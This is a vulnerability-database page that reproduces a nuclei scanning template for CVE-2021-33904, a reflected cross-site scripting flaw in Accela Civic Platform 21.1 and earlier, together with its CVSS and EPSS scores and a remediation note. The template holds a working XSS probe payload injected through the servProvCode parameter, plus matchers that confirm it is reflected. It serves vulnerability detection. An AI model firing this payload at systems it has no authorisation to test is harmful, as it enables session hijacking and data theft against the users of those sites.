Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-33904
HistoryJul 26, 2021 - 5:18 p.m.

Accela Civic Platform <=21.1 - Cross-Site Scripting

2021-07-2617:18:45
ProjectDiscovery
github.com
3
cve
cve2021
accela
xss
edb
packetstorm

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.002

Percentile

55.6%

Accela Civic Platform through 21.1 contains a cross-site scripting vulnerability via the security/hostSignon.do parameter servProvCode.

id: CVE-2021-33904

info:
  name: Accela Civic Platform <=21.1 - Cross-Site Scripting
  author: geeknik
  severity: medium
  description: Accela Civic Platform through 21.1 contains a cross-site scripting vulnerability via the security/hostSignon.do parameter servProvCode.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to a patched version of Accela Civic Platform (version >21.1) that includes proper input validation to mitigate the XSS vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/49980
    - https://gist.github.com/0xx7/3d934939d7122fe23db11bc48eda9d21
    - http://packetstormsecurity.com/files/163093/Accela-Civic-Platorm-21.1-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-33904
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-33904
    cwe-id: CWE-79
    epss-score: 0.00182
    epss-percentile: 0.55425
    cpe: cpe:2.3:a:accela:civic_platform:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: accela
    product: civic_platform
  tags: cve,cve2021,accela,xss,edb,packetstorm

http:
  - method: GET
    path:
      - "{{BaseURL}}/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "text/html"

      - type: word
        words:
          - '"k3woq"^confirm(document.domain)^"a2pbrnzx5a9"'
          - 'servProvCode'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a004630440220598ca0ea5a2191920903252d65a78b48659212316cb65eee6ae478d701b4189402203a1af1fd2ed527efa2b5d22b4d5183ea84c0d41b226d4b7f0e76f2c6a9180682:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.002

Percentile

55.6%

Related for NUCLEI:CVE-2021-33904